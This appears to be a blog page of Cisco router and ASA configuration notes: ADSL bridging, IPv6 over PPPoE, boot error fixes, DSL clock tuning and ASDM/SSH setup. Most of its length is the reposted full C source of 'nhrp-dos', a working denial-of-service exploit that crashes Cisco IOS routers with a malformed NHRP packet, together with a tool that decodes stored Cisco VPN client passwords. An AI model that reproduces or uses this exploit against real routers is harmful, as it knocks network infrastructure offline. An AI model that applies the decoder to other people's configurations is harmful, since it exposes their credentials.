Cisco

This is a configuration for use old cisco 827 router as rfc1483 bridge (a stupid pppoe modem) version 12.1 no service pad service timestamps debug uptime service timestamps log uptime no service password-encryption ! hostname Router ! ! ! ! ! ! ip subnet-zero no ip routing ! ! ! ! interface Ethernet0 no ip address no ip route-cache bridge-group 1 ! interface ATM0 no ip address no ip route-cache no atm ilmi-keepalive bundle-enable dsl operating-mode auto ! interface ATM0.1 point-to-point no ip route-cache pvc 8/35 encapsulation aal5snap ! bridge-group 1 ! ip classless no ip http server ! bridge 1 protocol ieee ! line con 0 transport input none stopbits 1 line vty 0 4 login ! scheduler max-task-time 5000 end

DRAFT ipv6 unicast-routing ipv6 cef interface FastEthernet0/0 ipv6 address NODE-PD ::1/64 ipv6 enable interface Dialer0 ipv6 address NODE-PD ::1/128 ipv6 enable ipv6 dhcp client pd NODE-PD rapid-commit ipv6 route ::/0 Dialer0 DRAFT

To my amazement, Telecom Italia released a pilot project of IPv6 deployment on residential/dynamic ip only adsl internet access, but on theirs support site there’s configuration only for some useless systems. So, I’ve decided to write a configuration for Cisco platform. Usually the typical Telecom Italia PPPoE or PPPoA ADSL connection with dynamic IPv4 only was authenticated with “aliceadsl” as user and password, now with bran new credential along IPv4 the endpoint router advertise a IPv6 /64 class (always dynamic). ...

Randomly, during bootup of Cisco hardware (IOS), error messages similar to these are displayed: %Error opening tftp://255.255.255.255/network-confg (Socket error) %Error opening tftp://255.255.255.255/cisconet.cfg (Socket error) %Error opening tftp://255.255.255.255/hostname-confg (Socket error) %Error opening tftp://255.255.255.255/hostname.cfg (Socket error) These error messages are related to the default service configuration option built into Cisco IOS software, which attempts to access the service configuration files from a network Trivial File Transfer Protocol (TFTP) server. In order to disable this feature, issue the no service config global command. ...

If you have performance problem on Cisco 1721, Cisco 2610XM-2651XM, Cisco 2691, and Cisco 3660, with WIC-1DSL - IOS 12.3(2) or above, probably depends on the default value associated with ALL5 clockrate. If yuo wanna check type the following command on your router: hellroute01#show controller atm0/0 | include ATM0/0 Interface: ATM0/0, Hardware: DSLSAR (with Alcatel ADSL Module), State: up SCC0 = 2600000 (ATM0/0) SCC3 = 1000000 (ATM0/0) hellroute01# If you get 2600000 (default value) on SCC0 or SCC1 your downlink speed rate probably is limitated at about 300 KB/s ...

fw01a> enable Password: fw01a# configure terminal fw01a(Config)# interface ethernet1 fw01a(Config-if)# nameif inside fw01a(Config-if)# ip address 192.168.1.1 255.255.255.0 fw01a(Config-if)# no shutdown fw01a(Config-if)# Activate ASDM and enable http server. fw01a(Config)# asdm image flash:/asdm.bin. fw01a(Config)# http server enable. Open a connection for your inside network. fw01a(Config)# http 192.168.1.0 255.255.255.0 inside Make sure all your config running properly. fw01a(Config)# show running http http server enabled http 192.168.1.0 255.255.255.0 inside fw01a(Config)# Now your Cisco ASA/PIX can be access from your PC, open your web browser then enter this address https://192.168.1.1/admin

I’m working on experimental wide lab network based on DMVPN/NBMA, with some friends, dynamic multipoing vpn is seem a great solution, looks like a cheap frame relay infrastructure over internet. Now the problem: what about security? especially in dynamical wan ip address envivorment durin spoke-spoke communication, is impossible define security rule on GRE level. Solution: I’m thinking about… Only for testing purpose, I find this exploit: /******************************************************************************/ /* */ /* nhrp-dos - Copyright by Martin Kluge, <mk@elxsi.de> */ /* */ /* Feel free to modify this code as you like, as long as you include the */ /* above copyright statement. */ /* */ /* Please use this code only to check your OWN cisco routers. */ /* */ /* Cisco bug ID: CSCin95836 */ /* */ /* The Next-Hop-Resolution Protocol (NHRP) is defined in RFC2332. It is used */ /* by a source host/router connected to a Non-Broadcast-Multi-Access (NBMA) */ /* subnetwork to determine the internetworking layer address and NBMA */ /* subnetwork addresses of the NBMA next hop towards the destination. */ /* NHRP is often used for dynamic multipoint VPNs (DMVPN) in combination with */ /* IPSEC. */ /* */ /* URLs: */ /* - [RFC2332/NHRP] http://rfc.net/rfc2332.html */ /* - [RFC1701/GRE] http://rfc.net/rfc1701.html */ /* - [DMVPNs with Cisco] http://www.cisco.com/en/US/tech/tk583/tk372/techno */ /* logies_white_paper09186a008018983e.shtml */ /* */ /* This code was only tested on FreeBSD and Linux, no warranty is or will be */ /* provided. */ /* */ /* Vulnerable images (tested): */ /* */ /* - c7100-jk9o3s-mz.123-12e.bin */ /* - c7200-jk8o3s-mz.122-40.bin */ /* - c3640-js-mz.122-15.T17.bin */ /* (and many other IOS versions on different platforms) */ /* */ /* Vulnerable configuration on cisco IOS: */ /* */ /* interface Tunnel0 */ /* ip address 10.0.0.1 255.255.255.128 */ /* no ip redirects */ /* no ip proxy-arp */ /* ip mtu 1464 */ /* ip nhrp authentication mysecret */ /* ip nhrp network-id 1000 */ /* ip nhrp map multicast dynamic */ /* ip nhrp server-only */ /* ip nhrp holdtime 30 */ /* tunnel source FastEthernet0/0 */ /* tunnel mode gre multipoint */ /* tunnel key 123456789 */ /* */ /* This exploit works even if "ip nhrp authentication" is configured on the */ /* cisco router. You can also specify a GRE key (use 0 to disable this */ /* feature) if the GRE tunnel is protected. You don't need to know the */ /* NHRP network id (or any other configuration details, except the GRE key if */ /* it is set on the target router). */ /* */ /* NOTE: The exploit only seems to work, if a NHRP session between the target */ /* router and at least one client is established. */ /* */ /* Code injection is also possible (thanks to sky for pointing this out), but */ /* it is not very easy and depends heavily on the IOS version / platform. */ /* */ /* Example: */ /* root@elxsi# ./nhrp-dos vr0 x.x.x.x 123456789 */ /* */ /* Router console output: */ /* */ /* -Traceback= 605D89A0 605D6B50 605BD974 605C08CC 605C2598 605C27E8 */ /* $0 : 00000000, AT : 62530000, v0 : 62740000, v1 : 62740000 */ /* <snip> */ /* EPC : 605D89A0, ErrorEPC : BFC01654, SREG : 3400FF03 */ /* Cause 00000024 (Code 0x9): Breakpoint exception */ /* */ /* Writing crashinfo to bootflash:crashinfo_20070321-155011 */ /* === Flushing messages (16:50:12 CET Wed Mar 21 2007) === */ /* */ /* Router reboots or sometimes hangs ;) */ /* */ /* */ /* Workaround: Disable NHRP ;) */ /* */ /* I'd like to thank the Cisco PSIRT and Clay Seaman-Kossmey for their help */ /* regarding this issue. */ /* */ /* Greetings fly to: sky, chilli, arbon, ripp, huega, gh0st, argonius, s0uls, */ /* xhr, bullet, nanoc, spekul, kaner, d, slobo, conny, H-Ra */ /* and #infiniteVOID */ /* */ /******************************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <net/if.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> /* BSD */ #define _BSD /* Header sizes */ #define IP_HDR_SIZE 20 #define GRE_HDR_SIZE 4 #define GRE_KEY_SIZE 4 #define NHRP_HDR_SIZE 62 /* Function prototypes */ int open_socket (void); int close_socket (int); int send_dos(int, unsigned long, unsigned long, unsigned long); unsigned long resolve_ip (char *); unsigned long get_int_ipv4 (char *); /* Globals */ int sockfd; int nhrp_req_id; /* GRE header */ struct gre_h { unsigned short flags; /* GRE flags */ unsigned short ptype; /* GRE protocol type */ unsigned int key; /* GRE key */ }; /* NHRP header */ struct nhrp_h { /* NHRP fixed header (20 bytes) */ struct { unsigned short afn; /* NHRP AFN */ unsigned short proto; /* NHRP protocol type */ unsigned int snap; /* NHRP SNAP */ unsigned short snapE:8; /* NHRP SNAP */ unsigned short hops:8; /* NHRP hop count */ unsigned short length; /* NHRP total length */ unsigned short checksum; /* NHRP checksum */ unsigned short mpoa_ext; /* NHRP MPOA extensions */ unsigned short version:8; /* NHRP version */ unsigned short type:8; /* NHRP type */ unsigned short nbma_addr:8; /* NHRP t/l of NBMA address */ unsigned short nbma_sub:8; /* NHRP t/l of NBMA subaddr */ } fixed; /* NHRP mandatory part */ struct { unsigned short src_len:8; /* NHRP src protocol length */ unsigned short dst_len:8; /* NHRP dest protocol length */ unsigned short flags; /* NHRP flags */ unsigned int request_id; /* NHRP request ID */ unsigned long client_nbma; /* NHRP client NBMA address */ unsigned long client_nbma_sub; /* NHRP client NBMA subaddr */ unsigned long client_pro_addr; /* NHRP client protocol addr */ } mand; /* NHRP client information entries (CIE) */ union { struct { unsigned short code:8; /* NHRP code */ unsigned short pref_len:8; /* NHRP prefix length */ unsigned short reserved; /* NHRP reserved */ unsigned short mtu; /* NHRP MTU */ unsigned short holding_time; /* NHRP holding time */ unsigned short len_client:8; /* NHRP t/l cl addr */ unsigned short len_client_sub:8;/* NHRP t/l cl sub */ unsigned short len_client_pro:8;/* NHRP t/l cl pro */ unsigned short preference:8; /* NHRP preference */ unsigned short ext; /* NHRP extension */ } cie; }; }; /* Main function */ int main (int argc, char **argv) { /* Check command line */ if(argc != 4) { fprintf(stderr, "\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n"); fprintf(stderr, "------------------------------------------------\n"); fprintf(stderr, "Usage: ./nhrp-dos <device> <target> <GRE key>\n"); fprintf(stderr, "(Set GRE key = 0 to disable GRE keys!)\n\n"); exit(EXIT_FAILURE); } /* Check UID */ if(getuid() != 0 && geteuid() != 0) { fprintf(stderr, "Error: Please run as root!\n"); exit(EXIT_FAILURE); } /* Open a socket */ sockfd = open_socket(); /* Send DoS packet */ send_dos(sockfd, get_int_ipv4(argv[1]), resolve_ip(argv[2]), atoi(argv[3])); /* Close the socket */ close_socket(sockfd); exit(EXIT_SUCCESS); } /* Open the socket */ int open_socket (void) { int fd; int one = 1; void *ptr = &one; /* Open the socket */ fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); if(fd < 0) { fprintf(stderr, "Error: open_socket: Unable to open socket.\n"); exit(EXIT_FAILURE); } /* Set IP_HDRINCL to include the IPv4 header in outgoing packets. */ /* Otherwise it would be done by the kernel. */ if(setsockopt(fd, IPPROTO_IP, IP_HDRINCL, ptr, sizeof(one)) < 0) { fprintf(stderr, "Error: open_socket: setsockopt failed.\n"); exit(EXIT_FAILURE); } #ifndef _BSD if(setsockopt(fd, IPPROTO_IP, SO_BROADCAST, ptr, sizeof(one)) < 0) { fprintf(stderr,"Error: open_socket: setsockopt failed.\n"); exit(EXIT_FAILURE); } #endif return(fd); } /* Close the socket */ int close_socket (int fd) { return(close(fd)); } /* Resolve the hostname to IP address */ unsigned long resolve_ip (char *host) { struct in_addr addr; struct hostent *host_ent; if((addr.s_addr = inet_addr(host)) == -1) { if(!(host_ent = gethostbyname(host))) return(-1); memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length); } return(addr.s_addr); } /* Get IPv4 address of DEVICE */ unsigned long get_int_ipv4 (char *device) { int tmp_fd; struct ifreq ifr; struct sockaddr_in *sin; tmp_fd = socket(PF_INET, SOCK_DGRAM, 0); if(tmp_fd < 0) { fprintf(stderr, "Error: get_int_ipv4: socket failed.\n"); exit(EXIT_FAILURE); } memset(&ifr, 0, sizeof(ifr)); sin = (struct sockaddr_in *) &ifr.ifr_addr; strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_addr.sa_family = AF_INET; if(ioctl(tmp_fd, SIOCGIFADDR, (char *) &ifr) < 0) { fprintf(stderr, "Error: get_int_ipv4: ioctl failed.\n"); exit(EXIT_FAILURE); } close(tmp_fd); return(sin->sin_addr.s_addr); } /* Send NHRP packet */ int send_dos (int fd, unsigned long src_ip, unsigned long dst_ip, unsigned long gre_key) { struct ip ip_hdr; struct ip *iphdr; struct gre_h gre_hdr; struct nhrp_h nhrp_hdr; struct sockaddr_in sin; unsigned int bytes = 0; int GRE_SIZE = GRE_HDR_SIZE; /* Packet buffer */ unsigned char *buf; if(gre_key!=0) GRE_SIZE+=GRE_KEY_SIZE; /* Allocate some memory */ buf = malloc(IP_HDR_SIZE+GRE_SIZE+NHRP_HDR_SIZE); if(buf < 0) { fprintf(stderr, "Error: send_dos: malloc failed.\n"); exit(EXIT_FAILURE); } /* Increment NHRP request ID */ nhrp_req_id++; /* IPv4 Header */ ip_hdr.ip_v = 4; /* IP version */ ip_hdr.ip_hl = 5; /* IP header length */ ip_hdr.ip_tos = 0x00; /* IP ToS */ ip_hdr.ip_len = htons(IP_HDR_SIZE + GRE_SIZE + NHRP_HDR_SIZE ); /* IP total length */ ip_hdr.ip_id = 0; /* IP identification */ ip_hdr.ip_off = 0; /* IP frag offset */ ip_hdr.ip_ttl = 64; /* IP time to live */ ip_hdr.ip_p = IPPROTO_GRE; /* IP protocol */ ip_hdr.ip_sum = 0; /* IP checksum */ ip_hdr.ip_src.s_addr = src_ip; /* IP source */ ip_hdr.ip_dst.s_addr = dst_ip; /* IP destination */ /* GRE header */ if(gre_key != 0) { gre_hdr.flags = htons(0x2000); /* GRE flags */ gre_hdr.key = htonl(gre_key); /* GRE key */ } else { gre_hdr.flags = 0; } gre_hdr.ptype = htons(0x2001); /* GRE type (NHRP) */ /* NHRP fixed header */ nhrp_hdr.fixed.afn = htons(0x0001); /* NHRP AFN */ nhrp_hdr.fixed.proto = htons(0x0800); /* NHRP protocol type */ nhrp_hdr.fixed.snap = 0; /* NHRP SNAP */ nhrp_hdr.fixed.snapE = 0; /* NHRP SNAP */ nhrp_hdr.fixed.hops = 0xFF; /* NHRP hop count */ /* DoS -> Set length to 0xFFFF */ nhrp_hdr.fixed.length = htons(0xFFFF); /* NHRP length */ /* Checksum can be incorrect */ nhrp_hdr.fixed.checksum = 0; /* NHRP checksum */ nhrp_hdr.fixed.mpoa_ext = htons(0x0034); /* NHRP MPOA ext */ nhrp_hdr.fixed.version = 1; /* NHRP version */ nhrp_hdr.fixed.type = 3; /* NHRP type */ nhrp_hdr.fixed.nbma_addr= 4; /* NHRP NBMA t/l addr */ nhrp_hdr.fixed.nbma_sub = 0; /* NHRP NBMA t/l sub */ /* NHRP mandatory part */ nhrp_hdr.mand.src_len = 4; /* NHRP src proto len */ nhrp_hdr.mand.dst_len = 4; /* NHRP dst proto len */ nhrp_hdr.mand.flags = htons(0x8000); /* NHRP flags */ nhrp_hdr.mand.request_id = htonl(nhrp_req_id); /* NHRP request ID */ nhrp_hdr.mand.client_nbma = src_ip; /* NHRP client addr */ nhrp_hdr.mand.client_nbma_sub = 0; /* NHRP client sub */ nhrp_hdr.mand.client_pro_addr = 0; /* NHRP client proto */ /* NHRP client information entries (CIE) */ nhrp_hdr.cie.code = 0; /* NHRP code */ nhrp_hdr.cie.pref_len = 0xFF; /* NHRP prefix len */ nhrp_hdr.cie.reserved = 0x0000; /* NHRP reserved */ nhrp_hdr.cie.mtu = htons(1514); /* NHRP mtu */ nhrp_hdr.cie.holding_time = htons(30); /* NHRP holding time */ nhrp_hdr.cie.len_client = 0; /* NHRP t/l client */ nhrp_hdr.cie.len_client_sub = 0; /* NHRP t/l sub */ nhrp_hdr.cie.len_client_pro = 0; /* NHRP t/l pro */ nhrp_hdr.cie.preference = 0; /* NHRP preference */ nhrp_hdr.cie.ext = htons(0x8003); /* NHRP C/U/Type (ext)*/ /* Copy the IPv4 header to the buffer */ memcpy(buf, (unsigned char *) &ip_hdr, sizeof(ip_hdr)); /* Copy the GRE header to the buffer */ memcpy(buf + IP_HDR_SIZE, (unsigned char *) &gre_hdr, sizeof(gre_hdr)); /* Copy the NHRP header to the buffer */ memcpy(buf + IP_HDR_SIZE + GRE_SIZE, (unsigned char *) &nhrp_hdr, sizeof(nhrp_hdr)); /* Fix some BSD bugs */ #ifdef _BSD iphdr = (struct ip *) buf; iphdr->ip_len = ntohs(iphdr->ip_len); iphdr->ip_off = ntohs(iphdr->ip_off); #endif memset(&sin, 0, sizeof(struct sockaddr_in)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = iphdr->ip_dst.s_addr; printf("\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n"); printf("------------------------------------------------\n"); printf("Sending DoS packet..."); /* Send the packet */ bytes = sendto(fd, buf, IP_HDR_SIZE + GRE_SIZE + NHRP_HDR_SIZE, 0, (struct sockaddr *) &sin, sizeof(struct sockaddr)); printf("DONE (%d bytes)\n\n", bytes); /* Free the buffer */ free(buf); /* Return number of bytes */ return(bytes); } // milw0rm.com [2007-08-09] Download

/* Decoder for password encoding of Cisco VPN client. Copyright (C) 2005 Maurice Massar Thanks to HAL-9000@evilscientists.de for decoding and posting the algorithm!This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /* Requires libgcrypt version 1.1.90 or newer Compile with: gcc -Wall -o cisco-decrypt cisco-decrypt.c $(libgcrypt-config --libs --cflags) Usage: ./cisco-decrypt DEADBEEF...012345678 424242...7261 */ #include <stdio.h> #include <stdlib.h> #include <gcrypt.h> #include <errno.h> int hex2bin_c(unsigned int c) { if ((c >= '0')&&(c <= '9')) return c - '0'; if ((c >= 'A')&&(c <= 'F')) return c - 'A' + 10; if ((c >= 'a')&&(c <= 'f')) return c - 'a' + 10; return -1; } int hex2bin(const char *str, char **bin, int *len) { char *p; int i, l; if (!bin) return EINVAL; for (i = 0; str[i] != '\0'; i++) if (hex2bin_c(str[i]) == -1) return EINVAL; l = i; if ((l & 1) != 0) return EINVAL; l /= 2; p = malloc(l); if (p == NULL) return ENOMEM; for (i = 0; i < l; i++) p[i] = hex2bin_c(str[i*2]) << 4 | hex2bin_c(str[i*2+1]); *bin = p; if (len) *len = l; return 0; } int c_decrypt(char *ct, int len, char **resp, char *reslenp) { const char *h1 = ct; const char *h4 = ct + 20; const char *enc = ct + 40; char ht[20], h2[20], h3[20], key[24]; const char *iv = h1; char *res; gcry_cipher_hd_t ctx; int reslen; if (len < 48) return 0; len -= 40; memcpy(ht, h1, 20); ht[19]++; gcry_md_hash_buffer(GCRY_MD_SHA1, h2, ht, 20); ht[19] += 2; gcry_md_hash_buffer(GCRY_MD_SHA1, h3, ht, 20); memcpy(key, h2, 20); memcpy(key+20, h3, 4); /* who cares about parity anyway? */ gcry_md_hash_buffer(GCRY_MD_SHA1, ht, enc, len); if (memcmp(h4, ht, 20) != 0) return -1; res = malloc(len); if (res == NULL) return -1; gcry_cipher_open(&ctx, GCRY_CIPHER_3DES, GCRY_CIPHER_MODE_CBC, 0); gcry_cipher_setkey(ctx, key, 24); gcry_cipher_setiv(ctx, iv, 8); gcry_cipher_decrypt(ctx, (unsigned char *)res, len, (unsigned char *)enc, len); gcry_cipher_close(ctx); reslen = len - res[len-1]; res[reslen] = '\0'; if (resp) *resp = res; if (reslenp) *reslenp = reslen; return 0; } int main(int argc, char *argv[]) { int i, len, ret = 0; char *bin, *pw; gcry_check_version(NULL); for (i = 1; i < argc; i++) { ret = hex2bin(argv[i], &bin, &len); if (ret != 0) { perror("decoding input"); continue; } ret = c_decrypt(bin, len, &pw, NULL); free(bin); if (ret != 0) { perror("decrypting input"); continue; } printf("%s\n", pw); free(pw); } exit(ret != 0); } Download: cisco-decrypt

If you have tried to setup SSH access on a new ASA, it might not have worked the way you wanted. That is because the RSA keys need to be generated first. To do that: from configure terminal: fw01/act(config)# crypto key generate rsaINFO: The name for the keys will be: Keypair generation process begin. Please wait… And then configure SSH to be allowed from the inside interface: fw01/act(config)# ssh (inser your ip) (insert your netmask) outside ...

Non ho mai trovato la giusta implementazione per usarla, ma questo dovrebbe copiare la configurazione di apparati cisco automaticamente ad ogni salvataggio: archive path scp://leo:xxxxxx@hostname/home/leo/router-backups/router write-memory